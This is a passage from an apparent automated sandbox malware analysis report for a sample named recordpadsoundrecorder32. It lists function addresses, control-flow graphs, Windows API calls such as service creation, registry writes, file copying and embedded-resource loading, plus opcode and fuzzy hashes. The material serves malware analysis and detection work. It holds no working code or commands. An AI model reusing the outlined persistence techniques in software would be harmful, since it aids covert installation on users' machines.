                                                                                      control_flow_graph 104 40d3ab-40d3ad 105 40d3c6-40d3cc GetLocalTime call 401f27 104->105 106 40d3af-40d3c3 104->106 108 40d3d1-40d446 105->108 106->105 111 40d8a7 108->111 112 40d44c-40d451 108->112 113 40dba7 111->113 112->113 114 40dbaa 113->114 114->114
                                                                                      APIs
                                                                                      • GetLocalTime.KERNEL32(0040C2B8), ref: 0040D3C6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: LocalTime
                                                                                      • String ID: /chk$XiM#
                                                                                      • API String ID: 481472006-2768313731
                                                                                      • Opcode ID: 719ccb32c6d0f1224c08b4e1637f7109be7b56e533cc931ac7d4392f13334026
                                                                                      • Instruction ID: bfeb034239b7c7118683ac587487231c4a8ae608a4ee2d3b9eda992131e4dc08
                                                                                      • Opcode Fuzzy Hash: 719ccb32c6d0f1224c08b4e1637f7109be7b56e533cc931ac7d4392f13334026
                                                                                      • Instruction Fuzzy Hash: 4CE08630C18743E9D7117BA0CD088987FB1AB51314760463FE1A2754E1D73D549AEF4E
                                                                                      Function 0040364D Relevance: 4.5, APIs: 3, Instructions: 49COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 115 40364d-403657 116 403659-403664 GetCurrentProcess TerminateProcess 115->116 117 40366a-403680 115->117 116->117 118 403682-403689 117->118 119 4036be-4036d2 call 4036e6 117->119 121 40368b-403697 118->121 122 4036ad-4036bd call 4036e6 118->122 128 4036e4-4036e5 119->128 129 4036d4-4036de ExitProcess 119->129 125 403699-40369d 121->125 126 4036ac 121->126 122->119 130 4036a1-4036aa 125->130 131 40369f 125->131 126->122 130->125 130->126 131->130
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(?,?,00403638,?,00000000,00000000,00402FC7,00000000,00000000), ref: 0040365D
                                                                                      • TerminateProcess.KERNEL32(00000000,?,00403638,?,00000000,00000000,00402FC7,00000000,00000000), ref: 00403664
                                                                                      • ExitProcess.KERNEL32 ref: 004036DE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                      • String ID:
                                                                                      • API String ID: 1703294689-0
                                                                                      • Opcode ID: 45a62d5989472daa66da51cc5c0c53ccf8c07e521785adc499b880c08e76b42c
                                                                                      • Instruction ID: 8ec911347a9f6ebe748c774e3fffa0e274c2dea28e60d441966e3dc67073ffcc
                                                                                      • Opcode Fuzzy Hash: 45a62d5989472daa66da51cc5c0c53ccf8c07e521785adc499b880c08e76b42c
                                                                                      • Instruction Fuzzy Hash: A201C831644300FAD6309F25FE84A5A7FA8A791351B10493FE440723D1CB3AA9848E1C
                                                                                      Function 0040269D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 12COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 132 40269d-4026a9 CreateDirectoryA 133 40d1b2-40d61b call 402dc0 * 2 132->133
                                                                                      APIs
                                                                                      • CreateDirectoryA.KERNELBASE ref: 0040269D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectory
                                                                                      • String ID: .exe
                                                                                      • API String ID: 4241100979-4119554291
                                                                                      • Opcode ID: 6ff648dc406feb637f11e3f6b69f0d8219d4dba7ac56d197b0b02803ca9b4c05
                                                                                      • Instruction ID: 7be0dad2239628ad1372a9b2e638fdce078da6a21a9524e3c9378f4dc9fd0076
                                                                                      • Opcode Fuzzy Hash: 6ff648dc406feb637f11e3f6b69f0d8219d4dba7ac56d197b0b02803ca9b4c05
                                                                                      • Instruction Fuzzy Hash: CFC04C38596131F2D51132D10E0EE5F641C5D8E745334403F7142700D349FC180A56BF
                                                                                      Function 00404034 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 139 404034-404052 HeapCreate 140 404054-404061 call 403eec 139->140 141 40408a-40408c 139->141 144 404070-404073 140->144 145 404063-40406e call 40440b 140->145 147 404075 call 404c5c 144->147 148 40408d-404090 144->148 151 40407a-40407c 145->151 147->151 151->148 152 40407e-404084 HeapDestroy 151->152 152->141
                                                                                      APIs
                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F4F,00000000), ref: 00404045
                                                                                        • Part of subcall function 00403EEC: GetVersionExA.KERNEL32 ref: 00403F0B
                                                                                      • HeapDestroy.KERNEL32 ref: 00404084
                                                                                        • Part of subcall function 0040440B: HeapAlloc.KERNEL32(00000000,00000140,0040406D,000003F8), ref: 00404418
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocCreateDestroyVersion
                                                                                      • String ID:
                                                                                      • API String ID: 2507506473-0
                                                                                      • Opcode ID: 785e23c1ed37029bd7fa1e4a136f418f238003ec06b3befa2c01f286c825b2ce
                                                                                      • Instruction ID: 795a75c142ce263548137c971673ec0d69254cf7c95aacf64765c85fef2462b4
                                                                                      • Opcode Fuzzy Hash: 785e23c1ed37029bd7fa1e4a136f418f238003ec06b3befa2c01f286c825b2ce
                                                                                      • Instruction Fuzzy Hash: E9F065F060530199DB205F749F45B2A35989BC0765F10453FFB40F41D0EB788481990E
                                                                                      Function 00402571 Relevance: 3.0, APIs: 2, Instructions: 17registryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 153 402571-402579 RegCreateKeyExA 154 40d427 153->154 155 40d8a7-40dba7 154->155 156 40d42d-40d48c call 402c80 GetTickCount 154->156 161 40dbaa 155->161 156->155 161->161
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountCreateTick
                                                                                      • String ID:
                                                                                      • API String ID: 3069548982-0
                                                                                      • Opcode ID: ee8128013bf5e90e42cdd554de5022e84e0101b2628d331728f9b3f566d64dcf
                                                                                      • Instruction ID: ea209166fb0ef528cf99b9c0e38baeae1227fb332146ce63fc0e23087ad075ce
                                                                                      • Opcode Fuzzy Hash: ee8128013bf5e90e42cdd554de5022e84e0101b2628d331728f9b3f566d64dcf
                                                                                      • Instruction Fuzzy Hash: FCD05EB1D08109DBD7605BE0EE4EAE932785B04308F54403BEA8AF10C0DA7C955DA91E
                                                                                      Function 0040225A Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 162 40225a-40d90c call 402dc0 CopyFileA
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CopyFile
                                                                                      • String ID:
                                                                                      • API String ID: 1304948518-0
                                                                                      • Opcode ID: 8747868f841f3e86c60c04198b4c3812247f9f6c6e6f8a051b3cab23d1bc53d8
                                                                                      • Instruction ID: 18315759b2a842b5bc47b7c566bd7707562d10a9491666b6158da95836141683
                                                                                      • Opcode Fuzzy Hash: 8747868f841f3e86c60c04198b4c3812247f9f6c6e6f8a051b3cab23d1bc53d8
                                                                                      • Instruction Fuzzy Hash: 7DC08CB0C14109EAC2105AA19E4A9AA3B6C4B0038CB2000B7720BB1081EA3C854EA67B
                                                                                      Function 0040D23A Relevance: 1.5, APIs: 1, Instructions: 9registryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 169 40d23a-40d245 RegOpenKeyExA 170 40da42 169->170 171 40d24b 169->171 172 40da44 170->172 171->170 172->172
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Open
                                                                                      • String ID:
                                                                                      • API String ID: 71445658-0
                                                                                      • Opcode ID: 31de8d22fc593bc1c279bc5476df20698ba11a3bbf33a6183a20eb6f6725d707
                                                                                      • Instruction ID: 8040d302770a520428a66105e482caf9ceff3af2c13684b85fe4baa54a86378e
                                                                                      • Opcode Fuzzy Hash: 31de8d22fc593bc1c279bc5476df20698ba11a3bbf33a6183a20eb6f6725d707
                                                                                      • Instruction Fuzzy Hash: 47C09B30708406CDE7555BB14A082B77764B644344B704D76E44BF05D0F739850F591E
                                                                                      Function 0040D11D Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 173 40d11d-40d126 OpenSCManagerA 174 40d8ee 173->174
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: ManagerOpen
                                                                                      • String ID:
                                                                                      • API String ID: 1889721586-0
                                                                                      • Opcode ID: 86451105a0139d872ac9f7691e3aa5979c091675fabf703e7b9c18d13448488a
                                                                                      • Instruction ID: 5b145c32185f2fe23c23a9f3356da1e15a91333f529c69de665c0df8320d1f6d
                                                                                      • Opcode Fuzzy Hash: 86451105a0139d872ac9f7691e3aa5979c091675fabf703e7b9c18d13448488a
                                                                                      • Instruction Fuzzy Hash: C8B01270C05101FECB506F604F9801C35665500305330487AD103F10D0C73C4509FA2E
                                                                                      Function 00402914 Relevance: 1.5, APIs: 1, Instructions: 4registryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 175 402914-40291a RegCloseKey 176 40d8a7-40dba7 175->176 178 40dbaa 176->178 178->178
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Close
                                                                                      • String ID:
                                                                                      • API String ID: 3535843008-0
                                                                                      • Opcode ID: f5db5590c29d013d9deb5da303e7320bdae192f81683c438447ff80dd5f1286a
                                                                                      • Instruction ID: a672698ba65cf88ccc8542e474dbf54698bfe7b51bb9aee12de0e43c7b427ca3
                                                                                      • Opcode Fuzzy Hash: f5db5590c29d013d9deb5da303e7320bdae192f81683c438447ff80dd5f1286a
                                                                                      • Instruction Fuzzy Hash: E2A00271904514C6D64496949F4859877746504311751407ED152710D0D77C554A651D
                                                                                      Function 0040D639 Relevance: 1.5, APIs: 1, Instructions: 3registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Value
                                                                                      • String ID:
                                                                                      • API String ID: 3702945584-0
                                                                                      • Opcode ID: 30ccf38bae0651031a747be385cf41240ce9650c7b68b68cc0c0d266fe80d253
                                                                                      • Instruction ID: 56e8f69265871bb44e1bd22ced2ad85af3968b80b96cf2c0600ba62ef43449e4
                                                                                      • Opcode Fuzzy Hash: 30ccf38bae0651031a747be385cf41240ce9650c7b68b68cc0c0d266fe80d253
                                                                                      • Instruction Fuzzy Hash: 51A00275504404EBCB090B919B0C67C7E31B748305F151069E142704A08B751655AF19

                                                                                      Non-executed Functions

                                                                                      Function 00402588 Relevance: 1.5, APIs: 1, Instructions: 11serviceCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateServiceA.ADVAPI32(?,?,?,000F01FF), ref: 0040D586
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateService
                                                                                      • String ID:
                                                                                      • API String ID: 1592570254-0
                                                                                      • Opcode ID: b1d535fcba41d0c5bc0ec726a091b62f5efeb8c2f631be5d7d856abec158dcf1
                                                                                      • Instruction ID: 55442d6bb3312950ba1be5e0f5e2ac9e55e18be424259f3225f08959e138762c
                                                                                      • Opcode Fuzzy Hash: b1d535fcba41d0c5bc0ec726a091b62f5efeb8c2f631be5d7d856abec158dcf1
                                                                                      • Instruction Fuzzy Hash: 73C04C74D8C402F6C2210AD00D4983510282585795331083B6E47B44C199B8044FB12F
                                                                                      Function 004023B3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 75registrysynchronizationthreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegisterServiceCtrlHandlerA.ADVAPI32(UID Finder 6.11.66,Function_0000235E), ref: 004023C1
                                                                                      • SetServiceStatus.ADVAPI32(0040C408), ref: 00402420
                                                                                      • GetLastError.KERNEL32 ref: 00402422
                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
                                                                                      • GetLastError.KERNEL32 ref: 00402450
                                                                                      • SetServiceStatus.ADVAPI32(0040C408), ref: 00402480
                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000022CB,00000000,00000000,00000000), ref: 0040248C
                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
                                                                                      • CloseHandle.KERNEL32 ref: 004024A1
                                                                                      • SetServiceStatus.ADVAPI32(0040C408), ref: 004024CA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                                                      • String ID: UID Finder 6.11.66
                                                                                      • API String ID: 3346042915-245170862
                                                                                      • Opcode ID: 8481bbef3285b0f9ebce9f82f4e1eb68b4ac82d1f0eae4c5cd12d91383da07eb
                                                                                      • Instruction ID: 4f107cf957cbd680cd4d605db27ce117804603c61eb7b626b01e69dba3e91430
                                                                                      • Opcode Fuzzy Hash: 8481bbef3285b0f9ebce9f82f4e1eb68b4ac82d1f0eae4c5cd12d91383da07eb
                                                                                      • Instruction Fuzzy Hash: 3521C570441214EBC2105F16EFE9A267FA8FBC5794B11823EE544B22B2CBB90549CFAD
                                                                                      Function 00406897 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 177COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LCMapStringW.KERNEL32(00000000,00000100,00408650,00000001,00000000,00000000,00000103,00000001,00000000,?,00406357,00200020,00000000,?,00000000,00000000), ref: 004068D9
                                                                                      • LCMapStringA.KERNEL32(00000000,00000100,0040864C,00000001,00000000,00000000,?,00406357,00200020,00000000,?,00000000,00000000,00000001), ref: 004068F5
                                                                                      • LCMapStringA.KERNEL32(?,?,?,?,Wc@ ,?,00000103,00000001,00000000,?,00406357,00200020,00000000,?,00000000,00000000), ref: 0040693E
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00406357,00200020,00000000,?,00000000,00000000), ref: 00406976
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00406357,00200020,00000000,?,00000000), ref: 004069CE
                                                                                      • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00406357,00200020,00000000,?,00000000), ref: 004069E4
                                                                                      • LCMapStringW.KERNEL32(?,?,?,00000000,Wc@ ,?,?,00406357,00200020,00000000,?,00000000), ref: 00406A17
                                                                                      • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00406357,00200020,00000000,?,00000000), ref: 00406A7F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: String$ByteCharMultiWide
                                                                                      • String ID: Wc@
                                                                                      • API String ID: 352835431-4128830131
                                                                                      • Opcode ID: c59ed56cf9200d4eb4cbe2117608f716f3cf8688afb6deb225ba4043c85c6758
                                                                                      • Instruction ID: c30aaca26a5f6a0372154cda3c497b92e07e281ea3e6606adb1712902525b657
                                                                                      • Opcode Fuzzy Hash: c59ed56cf9200d4eb4cbe2117608f716f3cf8688afb6deb225ba4043c85c6758
                                                                                      • Instruction Fuzzy Hash: 8A517E71A00209EBCF219F94CD45ADF7FB5FB49750F11812AF911B12A0D7398921DF69
                                                                                      Function 00403BE2 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 132COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402F74), ref: 00403BFD
                                                                                      • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402F74), ref: 00403C11
                                                                                      • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402F74), ref: 00403C3D
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402F74), ref: 00403C75
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402F74), ref: 00403C97
                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402F74), ref: 00403CB0
                                                                                      • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402F74), ref: 00403CC3
                                                                                      • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00403D01
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                      • String ID: t/@
                                                                                      • API String ID: 1823725401-3363397731
                                                                                      • Opcode ID: aff10945ecf90bbee9edc284fe0c12867232451494807f8f70b2732d2a40bc2d
                                                                                      • Instruction ID: 879d38be92084954eaea71e49c87bd85cc2f9a5de8a3f101a3316a48e994b743
                                                                                      • Opcode Fuzzy Hash: aff10945ecf90bbee9edc284fe0c12867232451494807f8f70b2732d2a40bc2d
                                                                                      • Instruction Fuzzy Hash: 3E31017350C2246EE7203F746CC483BBE9CEA4575AB15053FF982F3280DA398E8146AD
                                                                                      Function 004065B8 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,004043C1,?,Microsoft Visual C++ Runtime Library,00012010,?,00408584,?,004085D4,?,?,?,Runtime Error!Program: ), ref: 004065CA
                                                                                      • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004065E2
                                                                                      • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004065F3
                                                                                      • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00406600
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                      • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                      • API String ID: 2238633743-4044615076
                                                                                      • Opcode ID: 1e827d42bf4979efd8fc0e05e1792a28396127eff3a42ececc528c363af0fc92
                                                                                      • Instruction ID: db39845ca5f1b339293cd545309a4189fd77c948f0b46f5b4ed21715b02f5541
                                                                                      • Opcode Fuzzy Hash: 1e827d42bf4979efd8fc0e05e1792a28396127eff3a42ececc528c363af0fc92
                                                                                      • Instruction Fuzzy Hash: 46018871A40611EFC7208FB5AFC49277EE99B587407061D3FA541F2291DE7B8811CB6D
                                                                                      Function 0040674E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetStringTypeW.KERNEL32(00000001,00408650,00000001,00000000,00000103,00000001,00000000,00406357,00200020,00000000,?,00000000,00000000,00000001), ref: 0040678D
                                                                                      • GetStringTypeA.KERNEL32(00000000,00000001,0040864C,00000001,?,?,00000000,00000000,00000001), ref: 004067A7
                                                                                      • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00406357,00200020,00000000,?,00000000,00000000,00000001), ref: 004067DB
                                                                                      • MultiByteToWideChar.KERNEL32(Wc@ ,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00406357,00200020,00000000,?,00000000,00000000,00000001), ref: 00406813
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 00406869
                                                                                      • GetStringTypeW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 0040687B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: StringType$ByteCharMultiWide
                                                                                      • String ID: Wc@
                                                                                      • API String ID: 3852931651-4128830131
                                                                                      • Opcode ID: 51aa12949cff19f931a0c8f8e78869120ffa08a7a0a03f1196022c1900c26aa0
                                                                                      • Instruction ID: 956ec2585e1336e719d8d065e8dcf62e24d3c9f54db028b8b8152b0cc77897f4
                                                                                      • Opcode Fuzzy Hash: 51aa12949cff19f931a0c8f8e78869120ffa08a7a0a03f1196022c1900c26aa0
                                                                                      • Instruction Fuzzy Hash: 3F419F72501209EFCF20AF94DD85EAF3B79FB04754F11453AF902F2290C73989248BA9
                                                                                      Function 0040429D Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 0040430A
                                                                                      • GetStdHandle.KERNEL32(000000F4,00408584,00000000,?,00000000,00000000), ref: 004043E0
                                                                                      • WriteFile.KERNEL32(00000000), ref: 004043E7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$HandleModuleNameWrite
                                                                                      • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                      • API String ID: 3784150691-4022980321
                                                                                      • Opcode ID: efc2387ad9e4ebc715aa49f254a253419fe4c6ba22f87958d70440b8e59437cd
                                                                                      • Instruction ID: d8635e2a7f81e525e6493e1b235b12eebf94c6aed7416e9ae0bb5a91e3b582aa
                                                                                      • Opcode Fuzzy Hash: efc2387ad9e4ebc715aa49f254a253419fe4c6ba22f87958d70440b8e59437cd
                                                                                      • Instruction Fuzzy Hash: ED318572601219AEDF20AA60DE46FDA336CAF85304F1004BFF944B61D1DA78DE448A5D
                                                                                      Function 00401F64 Relevance: 12.1, APIs: 8, Instructions: 121memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                                                      • GetLastError.KERNEL32 ref: 00401F86
                                                                                      • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                                                      • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                                                      • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401FBF
                                                                                      • GetTickCount.KERNEL32 ref: 00401FFB
                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00402061
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                                      • String ID:
                                                                                      • API String ID: 564119183-0
